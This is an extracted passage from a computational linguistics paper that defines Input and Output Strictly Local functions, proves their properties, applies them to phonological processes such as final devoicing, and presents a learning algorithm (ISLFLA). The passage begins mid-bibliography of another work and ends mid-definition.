models and empirical tests. Organizational Research Methods 18: 542–569. Žiberna, A. 2014. Blockmodeling of multilevel networks. Social Networks 39: 46–61. Žiberna, A. and Lazega, E. 2016. Role sets and division of work at two levels of collective agency: the case of blockmodeling a multilevel (inter-individual and inter-organizational) network. In Lazega, E. and Snijders, T. (Eds), Multilevel Network Analysis: Theory, Methods and Applications, Springer, Dordrecht. Ziherl, P., Iglic, H. and Ferligoj, A. 2006. Research groups’ social capital: a clustering approach. Metodoloski Zvezki 3: 217. work_ha75pkb77fcyza2iudmhhibak4 ---- Learning Strictly Local Subsequential Functions Jane Chandlee University of Delaware Department of Linguistics and Cognitive Science 125 East Main Street Newark, DE 19716 janemc@udel.edu Rémi Eyraud QARMA team Laboratoire d’Informatique Fondamentale Marseille, France remi.eyraud@ lif.univ-mrs.fr Jeffrey Heinz University of Delaware Department of Linguistics and Cognitive Science 125 East Main Street Newark, DE 19716 heinz@udel.edu Abstract We define two proper subclasses of sub- sequential functions based on the concept of Strict Locality (McNaughton and Papert, 1971; Rogers and Pullum, 2011; Rogers et al., 2013) for formal languages. They are called Input and Output Strictly Local (ISL and OSL). We provide an automata-theoretic characterization of the ISL class and theorems establishing how the classes are related to each other and to Strictly Local languages. We give evidence that local phonological and morpho- logical processes belong to these classes. Fi- nally we provide a learning algorithm which provably identifies the class of ISL functions in the limit from positive data in polynomial time and data. We demonstrate this learning result on appropriately synthesized artificial corpora. We leave a similar learning result for OSL functions for future work and sug- gest future directions for addressing non-local phonological processes. 1 Introduction In this paper we define two proper subclasses of sub- sequential functions based on the properties of the well-studied Strictly Local formal languages (Mc- Naughton and Papert, 1971; Rogers and Pullum, 2011; Rogers et al., 2013). These are languages that can be defined with grammars of substrings of length k (called k-factors), such that a string is in the language only if its own k-factors are a subset of the grammar. These languages have also been char- acterized by Rogers and Pullum (2011) as those that have the property expressed in the following theo- rem (which can be taken as a defining property): Theorem 1 (Suffix Substitution Closure). L is Strictly Local iff for all strings u1, v1, u2, v2, there exists k ∈ N such that for any string x of length k − 1, if u1xv1, u2xv2 ∈ L, then u1xv2 ∈ L. These languages can model natural language phonotactic constraints which pick out contiguous substrings bounded by some length k (Heinz, 2007; Heinz, 2010). We define Input Strictly Local (ISL) and Output Strictly Local (OSL) functions which model phonological processes for which the target and triggering context are a bounded contiguous substring. Here our use of ‘process’ is not specific to rule-based grammatical formalisms (such as SPE (Chomsky and Halle, 1968)). ISL and OSL func- tions model mappings from underlying forms to sur- face forms, which are also the bedrock of constraint- based frameworks like Optimality Theory (Prince and Smolensky, 1993). By showing that local phonological processes can be modeled with ISL (and OSL) functions, we pro- vide the strongest computational characterization of the input-output mappings these processes repre- sent. While it has been shown that phonological mappings describable with rules of the form A → B / C D (where A, B, C, and D are regular languages) are regular (Johnson, 1972; Kaplan and Kay, 1994), and even subsequential (Chandlee and Heinz, 2012; Heinz and Lai, 2013), many logically possible regular and subsequential mappings are not plausible phonological mappings. Since these im- plausible mappings cannot be modeled with ISL or OSL functions, we provide a more precise notion of 491 Transactions of the Association for Computational Linguistics, vol. 2, pp. 491–503, 2014. Action Editor: Alexander Clark. Submitted 4/2014; Revised 8/2014; Published November 1, 2014. c⃝2014 Association for Computational Linguistics. what constitues plausible phonological mappings. In addition, we present the Input SL Function Learning Algorithm (ISLFLA) and prove that it identifies this class in the limit (Gold, 1967) in poly- nomial time and data (de la Higuera, 1997). Our approach follows previous work on learning subse- quential transductions, namely Oncina et al. (1993), Oncina and Varò (1996), Castellanos et al. (1998), and Gildea and Jurafsky (1996). Oncina et al. (1993) present OSTIA (Onward Subsequential Transducer Inference Algorithm), an algorithm that learns the class of subsequential functions in the limit from positive data. OSTIA is only guaranteed to identify total functions exactly, but Oncina and Varò (1996) and Castellanos et al. (1998) present the modifica- tions OSTIA-N, OSTIA-D, and OSTIA-R, which learn partial functions using negative data, domain information, and range information, respectively. In terms of linguistic applications, Gildea and Jurafsky (1996) show that OSTIA fails to learn the phonological mapping of English flapping when given natural language data. The authors modified OSTIA with three learning heuristics (context, com- munity, and faithfulness) and showed that the mod- ified learner successfully learns flapping and sev- eral other phonological rules. Context encodes the idea that phonological changes depend on the con- text of the segment undergoing the change. Commu- nity gives the learner the ability to deduce that seg- ments belonging to a natural class are likely to be- have similarly. Lastly, faithfulness, by which under- lying segments are assumed to be realized similarly on the surface, was encoded with a forced alignment between the input-output strings in the data set.1 We believe this alignment removes OSTIA’s guarantee that all subsequential functions are learned. Similar to the approach of Gildea and Jurafsky (1996), our learner employs a context bias because it knows its target is an ISL function and therefore the transduction only involves bounded contiguous substrings. And similar to OSTIA-D (Oncina and Varò, 1996; Castellanos et al., 1998), the ISLFLA makes use of domain information, because it makes decisions based on the input strings of the data set. It also employs a faithfulness bias in terms of the prop- 1The alignment was similar to the string-edit distance mehod used in Hulden et al. (2011). erty onwardness (see §2). The ISLFLA is supported by a theoretical result like Oncina et al. (1993), but learns a more restrictive class of mappings. We be- lieve the theoretical results for this class will lead to new algorithms which include something akin to the community bias and that will succeed on natural lan- guage data while keeping strong theoretical results. The proposed learner also builds on earlier work by Chandlee and Koirala (2014) and Chandlee and Jardine (2014) which also used strict locality to learn phonological processes but with weaker theoretical results. The former did not precisely identify the class of functions the learner could learn, and the latter could only guarantee learnability of the ISL functions with a closed learning sample. The paper is organized as follows. §2 presents the mathematical notations to be used. §3 defines ISL and OSL functions, provides an automata-theoretic characterization for ISL, and establishes some prop- erties of these classes. §4 demonstrates how these functions can model local phonological processes, including substitution, insertion, and deletion. §5 presents the ISLFLA, proves that it efficiently learns the class of ISL functions, and provides demonstra- tions. §6 concludes. 2 Preliminaries The set of all possible finite strings of symbols from a finite alphabet Σ and the set of strings of length ≤ n are Σ∗ and Σ≤n, respectively. The unique empty string is represented with λ. The length of a string w is |w|, so |λ| = 0. The set of prefixes of w, Pref(w), is {p ∈ Σ∗ | (∃s ∈ Σ∗)[w = ps]}, and the set of suf- fixes of w, Suff(w), is {s ∈ Σ∗ | (∃p ∈ Σ∗)[w = ps]}. For all w ∈ Σ∗ and n ∈ N, Suffn(w) is the single suffix of w of length n if |w| ≥ n; otherwise Suffn(w) = w. If w = ps, then ws−1 = p and p−1w = s. The longest common prefix of a set of strings S, lcp(S), is p ∈ ∩w∈SPref(w) such that ∀p′ ∈∩w∈SPref(w), |p′| < |p|. A function f with domain A and co-domain B is written f : A → B. We sometimes write x 7→f y for f(x) = y. When A and B are free monoids (like Σ∗), the input and output languages of a function f are the stringsets dom(f) = {x | (∃y)[x 7→f y]} and image(f) = {y | (∃x)[x 7→f y]}, respectively. Following Oncina et al. (1993), a subsequen- 492 tial finite state transducer (SFST) is a 6-tuple (Q,q0, Σ, Γ,δ,σ), where Q is a finite set of states, Σ and Γ are finite alphabets, q0 ∈ Q is the initial state, δ ⊆ Q × Σ × Γ∗ × Q is a set of edges, and σ : Q → Γ∗ is the final output function that maps states to strings that are appended to the output if the input ends in that state. δ recursively defines a map- ping δ∗: (q,λ,λ,q) ∈ δ∗; if (q,u,v,q′) ∈ δ∗ and (q′,σ,w,q′′) ∈ δ then (q,uσ,vw,q′′) ∈ δ∗. SFSTs are deterministic, which means their edges have the following property: [(q,a,u,r), (q,a,v,s) ∈ δ ⇒ u = v ∧ r = s]. Hence, we also refer to δ as the transition function, and ∀(q,a,u,r) ∈ δ, we let δ1(q,a) = u and δ2(q,a) = r. The relation that a SFST T recog- nizes/accepts/generates is R(T ) = { (x,yz) ∈ Σ∗ × Γ∗ | (∃q ∈ Q)[ (q0,x,y,q) ∈ δ∗ ∧z = σ(q) ]} . Since SFSTs are deterministic, the relations they recognize are functions. Subsequential functions are defined as those describable with SFSTs. For any function f : Σ∗ → Γ∗ and x ∈ Σ∗, let the tails of x with respect to f be defined as tailsf (x) = { (y,v) | f(xy) = uv ∧ u = lcp(f(xΣ∗)) } . If strings x1,x2 ∈ Σ∗ have the same set of tails with respect to a function f, they are tail-equivalent with respect to f and we write x1 ∼f x2. Clearly, ∼f is an equivalence relation which partitions Σ∗. Theorem 2 (Oncina and Garcia, 1991). A function f is subsequential iff ∼f partitions Σ∗ into finitely many blocks. The above theorem can be seen as the functional analogue to the MyHill-Nerode theorem for regular languages. Recall that for any stringset L, the tails of a word w w.r.t. L is defined as tailsL(w) = {u | wu ∈ L}. These tails can be used to par- tition Σ∗ into a finite set of equivalence classes iff L is regular. Furthermore, these equivalence classes are the basis for constructing the (unique up to isomorphism) smallest deterministic acceptor for a regular language. Likewise, Oncina and Gar- cia’s proof of Theorem 2 shows how to construct the (unique up to isomorphism) smallest SFST for a subsequential function f. We refer to this trans- ducer as the canonical transducer for f and denote it with T Cf . The states of T Cf are in one-to-one corre- spondence with tailsf (x) for all x ∈ Σ∗ (Oncina and Garcı́a, 1991). To construct T Cf first let, for all x ∈ Σ∗ and a ∈ Σ, the contribution of a w.r.t. x be contf (a,x) = lcp(f(xΣ∗)−1lcp(f(xaΣ∗)). Then, • Q = {tailsf (x) | x ∈ Σ∗}, • q0 = tailsf (λ), • ∀tailsf (x) ∈ Q, σ(tailsf (x)) = lcp(f(xΣ∗))−1f(x) if x ∈ dom(f) and is un- defined otherwise, • δ = { (tailsf (x),a,contf (a,x), tailsf (xa))}. T Cf has an important property called onwardness. Definition 1 (onwardness). For all q ∈ Q let the outputs of the edges out of q be outs(q) = { u | (∃a ∈ Σ)(∃r ∈ Q)[(q,a,u,r) ∈ δ] } . A SFST T is onward if for all q ∈ Q\{q0}, lcp(outs(q)) = λ. Informally, this means that the writing of output is never delayed. Readers are referred to Oncina and Garcı́a (1991), Oncina et al. (1993), and Mohri (1997) for more on SFSTs. 3 Strictly Local Functions In this section we define Input and Output Strictly Local functions and provide properties of these classes. These definitions are analogous to the language-theoretic definition of Strictly Local lan- guages (Theorem 1) (Rogers and Pullum, 2011; Rogers et al., 2013). Definition 2 (Input Strictly Local Function). A func- tion f is Input Strictly Local (ISL) if there is a k such that for all u1,u2 ∈ Σ∗, if Suffk−1(u1) = Suffk−1(u2) then tailsf (u1) = tailsf (u2). The theorem below establishes an automata- theoretic characterization of ISL functions. Theorem 3. A function f is ISL iff there is some k such that f can be described with a SFST for which 1. Q = Σ≤k−1 and q0 = λ 2. (∀q ∈ Q,∀a ∈ Σ,∀u ∈ Γ∗)[ (q,a,u,q′) ∈ δ ⇒ q′ = Suffk−1(qa) ] . 493 This theorem helps make clear how ISL functions are Markovian: the output for input symbol a de- pends on the last (k− 1) input symbols. Also, since the transducer defined in Theorem 3 is determinis- tic, it is unique and we refer to it as T ISLf . T ISLf may not be isomorphic to T Cf . Figure 1 shows T ISLf (with k = 2) and T Cf for the identity function.2 a b! a ba b #:! #:!#:! a b T 2!ISL for identity function ! #:! a,b T C for identity function 1 Figure 1: Non-isomorphic T ISLf (left) and T Cf (right) Before we present the proof of Theorem 3, we make the following remarks, and then prove a lemma. Remark 1. For all n,m ∈ N with n ≤ m, and for all w ∈ Σ∗, Suffn(Suffm(w)) = Suffn(w) since both w and Suffm(w) share the same n-long suffix. Remark 2. For all w,v ∈ Σ∗,k ∈ N, Suffk−1 ( Suffk−1(w)v ) = Suffk−1(wv). This is a direct consequence of Remark 1. Lemma 1. Let T be a SFST constructed as in The- orem 3. If (λ,w,u,q) in δ∗ then q = Suffk−1(w). Proof. The proof is by induction on δ∗. The base case follows from the facts that (λ,λ,λ,λ) ∈ δ∗ (by definition of δ∗), and that λ = Suffk−1(λ). Next assume the inductive hypothesis (IH) that there exists w ∈ Σ∗, u ∈ Γ∗, such that (λ,w,u,q) ∈ δ∗ implies q = Suffk−1(w). We show ∀a ∈ Σ, ∀x ∈ Γ∗ that (λ,wa,ux,q′) ∈ δ∗ implies q′ = Suffk−1(wa). Now (λ,w,u,Suffk−1(w)) ∈ δ∗ (by IH) so (Suffk−1(w),a,x,q′) ∈ δ. By construc- tion of T , q′ = Suffk−1(Suffk−1(w)a), which by Remark 2, equals Suffk−1(wa). Proof of Theorem 3. (⇐) Fix k ∈ N and let f be a function described by T = {Q,q0, Σ, Γ,δ,σ} con- structed as in Theorem 3. Let w1,w2 ∈ Σ∗ such that Suffk−1(w1) = Suffk−1(w2). By Lemma 1, 2In all figures, single-symbol transition labels indicate that the input and output are identical, and the final output function is represented as a transition on the end-of-word symbol #. both w1 and w2 lead to the same state and therefore tailsf (w1) = tailsf (w2). Thus f is k-ISL. (⇒) Consider any ISL function f. Then there is a k such that (∀w1,w2 ∈ Σ∗)[Suffk−1(w1) = Suffk−1(w2) ⇒ tailsf (w1) = tailsf (w2)]. We show that T ISLf exists. Since Σ≤k−1 is a finite set, the equivalence relation ∼f partitions Σ∗ into at most |Σ≤k−1| blocks. Hence by Theorem 2, f is subsequential and a canonical subsequential trans- ducer T Cf = {Qc,q0c, Σ, Γ,δc,σc} exists. Construct T = {Q,q0, Σ, Γ,δ,σ} as follows: • Q = Σ≤k−1 and q0 = λ • ∀q ∈ Q,σ(q) = σc ( tailsf (q) ) if f(q) is de- fined, else σ(q) is undefined. • ∀q ∈ Q, ∀a ∈ Σ, ∀u ∈ Γ∗,( q,a,u,Suffk−1(qa) ) ∈ δ iff( tailsf (q),a,u,tailsf (qa) ) ∈ δc. First, by its construction, the states and transitions of T meet requirements (1) and (2) of Theorem 3. Next, we show that T computes the same function as T Cf . We first establish by induc- tion on δ∗ the following (?): ∀w ∈ Σ∗, ∀u ∈ Γ∗, ( q0,w,u,Suff k−1(w) ) ∈ δ∗ iff( tailsf (λ),w,u,tailsf (w) ) ∈ δ∗c . Clearly ( tailsf (λ),λ,λ,tailsf (λ) ) ∈ δ∗c and( λ,λ,λ,λ ) ∈ δ∗ by definition of the extended tran- sition function. Thus the base case is satisfied. Next assume the inductive hypothesis (IH) for w ∈ Σ∗ and u ∈ Γ∗. We show ∀a ∈ Σ and ∀x ∈ Γ∗ that ( λ,wa,ux,Suffk−1(wa) ) ∈ δ∗ iff( tailsf (λ),wa,ux,tailsf (wa) ) ∈ δ∗c . Suppose ( tailsf (λ),wa,ux,tailsf (wa) ) ∈ δ∗c . By IH, ( tailsf (λ),w,u,tailsf (w) ) ∈ δ∗c ; hence ( tailsf (w),a,x,tailsf (wa) ) ∈ δc. Let q = Suffk−1(w). Observe that Suffk−1(w) = Suffk−1(q) by Remark 1. Conse- quently, since f is k-ISL, tailsf (w) = tailsf (q). Similarly, Suffk−1(wa) = Suffk−1(qa) and thus tailsf (wa) = tailsf (qa). By substitution then, we have ( tailsf (λ),w,u,tailsf (q) ) ∈ δ∗c and( tailsf (q),a,x,tailsf (qa) ) ∈ δc. By construction of T , ( q,a,x,Suffk−1(qa) ) ∈ δ. By IH, ( λ,w,u,Suffk−1(w) ) = ( λ,w,u,q ) ∈ δ∗. Thus, ( λ,wa,ux,Suffk−1(qa) ) ∈ δ∗ which is the same as saying ( λ,wa,ux,Suffk−1(wa) ) ∈ δ∗. Conversely, consider any a ∈ Σ and x ∈ Γ∗ and suppose ( λ,wa,ux,Suffk−1(wa) ) ∈ δ∗. 494 By IH, ( λ,w,u,Suffk−1(w) ) ∈ δ∗; hence( Suffk−1(w),a,x,Suffk−1(wa) ) ∈ δ. As be- fore, letting q = Suffk−1(w), it follows that Suffk−1(w) = Suffk−1(q) so tailsf (w) = tailsf (q), and Suffk−1(wa) = Suffk−1(qa) so tailsf (wa) = tailsf (qa). Therefore,( q,a,x,Suffk−1(qa) ) ∈ δ. By construction of T , this means( tailsf (w),a,x,tailsf (wa) ) ∈ δc. By IH,( tailsf (λ),w,u,tailsf (w) ) ∈ δ∗c . By the defi- nition of the extended transition function, it follows that ( tailsf (λ),wa,ux,tailsf (wa) ) ∈ δ∗c . This completes the induction, establishing (?). Let w ∈ Σ∗. If f(w) is defined then f(w) = uv where ( tailsf (λ),w,u,tailsf (w) ) ∈ δ∗c and σc ( tailsf (w) ) = v. From (?), we know ( λ,w,u,Suffk−1(w) ) ∈ δ∗. Also, σ ( Suffk−1(w) ) = σc ( tailsf (Suff k−1(w)) ) . Since f is k-ISL, tailsf (w) = tailsf (Suff k−1(w)) (cf. Remark 1). Thus σ ( Suffk−1(w) ) = σc ( tailsf (w) ) = v. There- fore T (w) = uv also. If f(w) is not defined then there are two cases. Case 1: ( tailsf (λ),w,u,tailsf (w) ) 6∈ δ∗c . By the above lemma, it follows( λ,w,u,Suffk−1(w) ) 6∈ δ∗ and so T (w) is also de- fined. Case 2: ( tailsf (λ),w,u,tailsf (w) ) ∈ δ∗c but σc(tailsf (w)) is undefined. By construction of T , σ(Suffk−1(w)) is also undefined. Similar to Definition 2 above, the following defi- nition of OSL functions says that if the outputs of two input strings share the same suffix of length (k − 1), then those inputs have the same tails. Definition 3 (Output Strictly Local Function). A function f is Output Strictly Local (OSL) if there is a k such that for all u1,u2 ∈ Σ∗, if Suffk−1(f(u1)) = Suffk−1(f(u2)) then tailsf (u1) = tailsf (u2). The automata-theoretic characterization of this class is left as future work. Next, some properties of ISL and OSL functions are identified. The proofs of the following theorems will refer to the example SFSTs in Figure 2. First we establish that ISL and OSL functions are proper subclasses of the subsequential functions. (They are subclasses by definition.) Theorem 4. There are subsequential functions which are neither ISL nor OSL. 0 1 a #:! #:! b,c a,b:a,c f1 a b! b aa b #:! #:!#:! a:b b f2 1 a b! a a b,c:b #:! #:!#:! a,b:a,c:a b,c:b f3 a b! b a:aa a:aa b #:! #:! #:! a:aa b f4 1 0 1 a #:! #:a a f5 10 a a:! #:!#:! f6 1 Figure 2: Examples for proofs of Theorems 4-7 Proof. Consider the subsequential function f1 in Figure 2 and choose any k ∈ N. Since f1(bc kb) = bckb and f1(ackb) = acka it follows that tailsf1 (bc k) 6= tailsf1 (ack) even though in- puts bck and ack share a common suffix of length (k − 1). Likewise, the outputs of these inputs f1(bc k) = bck and f1(ack) = ack share a common suffix of length (k − 1), but the tails of these inputs, as mentioned, are distinct. Hence by Definitions 2 and 3, there is no k for which f1 is ISL or OSL. Theorem 5. The class of ISL functions is incompa- rable to the class of OSL functions. Proof. Consider f2 in Figure 2. This function is ISL by Theorem 3. However it is not OSL. Consider any k ∈ N. Observe that f2(aak) = f2(abk) = abk and so the outputs share the same suffix of length (k − 1). However, tailsf2 (aa k) 6= tailsf2 (abk) since (a,b) ∈ tailsf2 (aak) but (a,a) ∈ tailsf2 (abk). Similarly, consider f3 in Figure 2. This function is 2-OSL because inputs mapped to outputs which end in a have the same tails (i.e., they all lead to state a), and inputs mapped to outputs ending in b have the same tails. However, f3 is not ISL. Consider any k ∈ N. The inputs cbk and abk share the same suf- fix of length (k − 1). However, tailsf3 (cbk) 6= 495 tailsf3 (ab k) since (b,b) ∈ tailsf3 (cbk) but (b,a) ∈ tailsf3 (abk). Finally, the two classes are obviously not disjoint, since the identity function is both ISL and OSL. Theorem 6. The output language of an ISL or OSL function is not necessarily a Strictly Local language. Proof. Consider f4 in Figure 2. By Theorem 3, it is ISL. It is also 2-OSL since inputs mapped to out- puts which end in a have the same tails (i.e., they all lead to state a). Similarly, inputs mapped to outputs ending in b have the same tails. Let k ∈ N. Observe that f4(ak) = a2k and fur- ther that there is no input x and k such that f4(x) = a2k+1. Since a2k = ak−1aka = ak−2akaa, if the output language of f4 were SL it would follow, by Theorem 1, that ak−1akaa = a2k+1 also belongs to the output language. But there is no input in Σ∗ which f4 maps to an odd sequence of a’s. Theorem 7. If either the output or input language of a subsequential function f is Strictly Local then it does not follow that f belongs to either ISL or OSL. Proof. Let Σ = Γ = {a} and consider the function f5 which, for all n ∈ N, maps an to an if n is even and an to ana if n is odd. f5 is subsequential, as shown in Figure 2, and its domain, a∗, is a Strictly Local language. However, f5 is neither ISL nor OSL for any k since the tails of a2k includes (λ,λ) but the tails of aa2k includes (λ,a). Next consider f6, which for all n ∈ N maps an to am where m = (n div 2) if n is even and m = (n div 2)+1 if n is odd. f6 is subsequential, as shown in Figure 2, and the image(f) = a∗ is Strictly Local. However, f is neither ISL nor OSL for any k since the tails of a2k includes (a,a) but the tails of aa2k includes (a,λ). 4 Relevance to Phonology This section will briefly discuss the range of phono- logical processes that can be modeled with ISL and/or OSL functions by providing illustrative ex- amples for three common, representative processes. These are shown in (1) with SPE-style rules. (1) a. Devoicing: D → T / # b. Epenthesis: ∅ → @ / {l, r} [-coronal] c. Deletion: {T, D}→ ∅ / {T, s} See Chandlee (2014) for more details. First, consider the process of final obstruent de- voicing (1-a), attested in German and other lan- guages. This process causes an underlying voiced obstruent in word-final position to surface as its voiceless counterpart. In (1-a), D abbreviates the set of voiced obstruents and T the voiceless obstruents.3 The mapping from underlying form to surface form that this process describes is represented with the 2-ISL function in Figure 3 (note N represents any sonorant). ! D N T D:! N D:! N T T T:DT N:DND:! #:! #:T #:! #:! T D N 1 Figure 3: T ISLf for (1-a) with k = 2 and Σ = {T, D, N} In addition to substitution processes like (1-a), an- other common type of process is insertion of a seg- ment, such as the @-epenthesis process attested in Dutch (Warner et al., 2001). This process inserts a schwa between a liquid and a non-coronal con- sonant, as specified by (1-b). Using L to represent the liquids {l, r} and K to represent any non-coronal consonant, Figure 4 presents T ISLf for this process. Following Beesley and Karttunen (2003), the sym- bol ‘?’ represents any segment of the alphabet other than the ones for which transitions are defined.4 Lastly, an example deletion process from Greek (Joseph and Philippaki-Warburton, 1987) deletes in- terdental fricatives before /T/ or /s/, as in (1-c). Fig- ure 5 presents T ISLf for this process. 3These abbreviations serve to improve the readability of the FST - it is assumed that the transduction replaces a given voiced obstruent with its voiceless counterpart (not with any voiceless obstruent). 4This means Figure 4 is actually a shorthand for T ISLf , which would otherwise have a distinct state for each symbol now rep- resented with ‘?’. 496 ! K ? L K:@K ? K ? L L L ?K #:! #:! #:! #:! L K ? 1 Figure 4: T ISLf for (1-b) with k = 2 and Σ = {L, K, ?} ! D s ? T D:! s ? T:! s ?:T? s D:! ?:D? D:! T:! T:! D:T T:! ? s#:D #:! #:! #:! #:T T:! s ? D 1 Figure 5: T ISLf for (1-c) with k = 2 and Σ = {T, D, s, ?} The German, Dutch, and Greek examples demon- strate how ISL functions can be used to model the input-output mapping of a phonological rule. Be- yond substitution, insertion, and deletion, it is shown in Chandlee (2014) that ISL and/or OSL functions can also model many metathesis patterns, specifi- cally those for which there is an upper bound on the amount of material that intervenes between a segment’s original and surface positions (this ap- pears to include all synchronic patterns). In addi- tion, morpho-phonological processes such as local partial reduplication (i.e., in which the reduplicant is affixed adjacent to the portion of the base it was copied from) and general affixation are also shown to be ISL or OSL. More generally, we currently con- jecture that a SPE-style rewrite rule of the form A → B/ C D which applies simultaneously (left- to-right) describes an Input (Output) Strictly Local function iff there is a k such that for all w ∈ CAD it is the case that |w| ≤ k. We refer readers to Ka- plan and Kay (1994) and Hulden (2009) for more on how SPE rules and application modes determine mappings. In contrast, non-local (long-distance) processes such as vowel harmony with transparent vowels (Gainor et al., 2012; Heinz and Lai, 2013), long dis- tance consonant harmony (Hansson, 2001; Rose and Walker, 2004; Luo, 2013) and dissimilation (Suzuki, 1998; Bennett, 2013; Payne, 2013), unbounded dis- placement/metathesis (Chandlee et al., 2012; Chan- dlee and Heinz, 2012), non-local partial reduplica- tion (Riggle, 2003), and some tonal patterns (Jar- dine, 2013) cannot be modeled with ISL or OSL functions. In §6 we comment on the potential for adapting the current analysis to non-local mappings. The next section presents a learning algorithm for ISL functions, the ISLFLA. The development of a corresponding algorithm for OSL functions is the subject of ongoing work, but see §6 for comments. 5 Learning Input Strictly Local Functions We now present a learning algorithm for the class of ISL functions that uses its defining property as an in- ductive principle to generalize from a finite amount of data to a possibly infinite function. This learner begins with a prefix tree representation of this data and then generalizes by merging states.5 Its state merging criterion is based on the defining property of ISL functions: two input strings with the same suffix of length (k−1) have the same tails. The next section explains in detail how the algorithm works. 5.1 The Algorithm: ISLFLA Given a finite dataset D of input-output string pairs (w,w′) such that f(w) = w′, where f is the target function, the learner tries to build T ISLf . The dataset is submitted to the learner in the form of a prefix tree transducer (PTT), which is defined in Definition 4. Definition 4 (Prefix Tree Transducer). A prefix tree transducer for finite set D = {(w,w′) | f(w) = w′} for some f is PTT(D) = (Q,q0, Σ, Γ,δ,σ), where • Q = ⋃ {Pref(w)|(w,w′) ∈ D} and q0 = λ • δ = {(u,a,λ,ua) | u,ua ∈ Q} • σ(w) = w′ for all (w,w′) ∈ D 5This general strategy is common in grammatical inference. See Angluin (1982), Heinz (2009), and de la Higuera (2010). 497 As an example, the sample of data in (2) exempli- fies the final devoicing rule in (1-a). Figure 6 gives the PTT for this data. (2) {(D, T), (DD, DT), (DNT, DNT), (NND, NNT), (TDN, TDN)} ! D N T TD TDN NN NND DD DN DNT T:! #:DNT D:! N:! #:DT #:T N:! D:! #:NNT #:TDNN:!D:! D:! N:! T:! #:! 1 Figure 6: PTT for the data in (2) Given such a PTT, the learner’s first step is to make it onward. In the PTT, the output string is with- held until the end of the input (i.e., #) is reached. In the onward version (shown in Figure 7), output is advanced as close to the root as possible. This in- volves determining the lcp of all the output strings of all outgoing transitions of a state (starting from the leaves) and suffixing that lcp to the output of the single incoming transition of the state. ! D N T TD TDN NN NND DD DN DNT T:! #:! D:DT N:DNT #:! #:T N:! D:! #:! #:!N:! D:! D:! N:NNT T:TDN #:! 1 Figure 7: Onward version of the PTT in Figure 6 Once the learner has constructed this onward rep- resentation of the data, it begins to merge states, using two nested loops. The outer loop proceeds through the entire state set (ordered lexicographi- cally) and merges each state with the state that cor- responds to its (k − 1)-length suffix. For example, for final devoicing k = 2, so each state will be merged with the state that represents its final sym- bol. This merging may introduce non-determinism, which must be removed since by definition T ISLf is deterministic. Non-determinism is removed in the inner loop with additional state merges. Consider the situation depicted on the lefthand side of Figure 8, which resulted from a previous merge. The non-determinism could be resolved by 0 1 2 3 4 5 D:! N:N D:! T:DT T:DTN 0 1 2 3 4 5 D:N N:NN D:! T:DT T:DT 1 Figure 8: Before (left) and after (right) pushback merging states 1 and 2, except for the fact that the output strings of the two transitions differ. Before merging 1 and 2, therefore, the learner performs an operation called pushback that retains the lcp of the two output strings and prefixes what’s left to all output strings of all outgoing transitions from the re- spective destination states. Definition 5 (pushback (Oncina et al., 1993)). For SFST T = (Q,q0, Σ, Γ,δ,σ), v ∈ Σ∗, and e = (q,a,w,q′) ∈ δ, pushback ( T ,v,e ) = (Q,q0, Σ, Γ,δ ′,σ) where δ′ = (δ ∪ {q,a,wv−1,q′)} ∪ {(q′,b,vz,q′′)|(q′,b,z,q′′) ∈ δ}) \ ({(q′,b,z,q′′)}∪{e}). In the example in Figure 8, pushback is applied to the edges (0,T,DT, 1) and (0,T,DTN, 2). Only the lcp of the output strings, which is DT, is retained as the output string of both edges. The remainder (which is λ and N, respectively) is prefixed to the output string of all transitions leaving the respective destination state. The result is shown on the right- hand side of Figure 8. Essentially, pushback ‘un- does’ onwardness when needed. After pushback, states 1 and 2 can be merged. This removes the initial non-determinism but creates new non-determinism. The inner loop iterates un- til all non-determinism is resolved, after which the outer loop continues with the next state in the order. If the inner loop encounters non-determinism that cannot be removed, the ISLFLA exits with a mes- sage indicating that the data sample is insufficient. Non-removable non-determinism occurs if and only if the situation depicted on the left in Figure 9 obtains. The normal procedure for removing non- 498 q #:! #:z q s t a:u a:v 1 Figure 9: Irreparable non-determinism (left) and non- determinism from an outer loop merge (right). determinism cannot be applied in this case. Assum- ing z 6= λ, all of z would have to be pushed back, but since this transition has no destination state there is nowhere for z to go. OSTIA handles this situ- ation by rejecting the outer loop merge that led to it, restoring the FST to its state before that merge and moving on to the next possible merge. But the ISLFLA cannot reject merges. If it could, the pos- sibility would arise that two states with the same (k − 1)-length suffix would remain distinct in the final FST the learner outputs. Such a FST would not (by definition) be ISL. Therefore, the algorithm is at an impasse: rejecting a merge can lead to a non-ISL FST, while allowing it can lead to a non- subsequential (hence non-ISL) FST. It therefore ter- minates. Below is pseudo-code for the ISLFLA. Data: PTT(D) Result: T ISLf τ = onward(PTT) q = next(Qτ,first(Qτ )) while q < last(Qτ ) do merge(q, Suffk−1(q)) while ∃(q,a,x,q1), (q,a,y,q2) ∈ δτ do if a = # and x 6= y then exit ‘Insufficient data’ else pushback(τ, (q,a,x,q1),lcp(x,y)) pushback(τ, (q,a,y,q2),lcp(x,y)) merge(q1,q2) q = next(Qτ,q) return τ Algorithm 1: Pseudo-code for the ISLFLA 5.2 Learning Results Here, we present a proof that the ISLFLA identifies the class of ISL functions in the limit from positive data, in the sense of Gold (1967), with polynomial bounds on time and data (de la Higuera, 1997). First, we establish the notion of characteristic sample. Definition 6 (Characteristic sample). A sample CS is characteristic of a function f for an algorithm A if for all samples S s.t. CS ⊆ S, A returns a represen- tation τ such that for all x ∈ dom(f), τ(x) = f(x), and for all x /∈ dom(f), τ(x) is not defined. We can now define the learning criteria. Definition 7 (Identification in polynomial time and data (de la Higuera, 1997)). A class F of functions is identifiable in polynomial time and data using a class T of representations iff there exist an algorithm A and two polynomials p() and q() such that: 1. Given a sample S of size m for f ∈ F, A re- turns a hypothesis in O(p(m)) time; 2. For each representation τ of size k of a function f ∈ F, there exists a characteristic sample CS of f for A of size at most O(q(k)). Essentially the proof for convergence follows from the fact that given a sufficient sample the al- gorithm merges all and only states with the same (k − 1)-length suffix. Clearly, merges in the outer loop only involve states with the same (k − 1)-length suffix. This is also the case for inner loop merges. Consider the scenario depicted on the right in Figure 9, in which q is a state created by an outer loop merge. After pushback, states s and t will be merged. If x = Suffk−1(q), then both s and t must have xa as a suffix. Since |xa| = k, it follows that Suffk−1(s) = Suffk−1(t). It also follows that additional states merged to remove non-determinism resulting from the merge of s and t will have the same suffix of length (k−1). To show that all states with the same (k − 1)-length suffix will be merged, it is shown that the ISLFLA will never encounter the situation in Figure 9, provided the data set includes a seed de- fined as follows. Definition 8 (ISLFLA seed). Given a k-ISL function f and T ISLf , let Q′ = {q ∈ Q | δ1(q, #) 6= λ}. A seed for f is 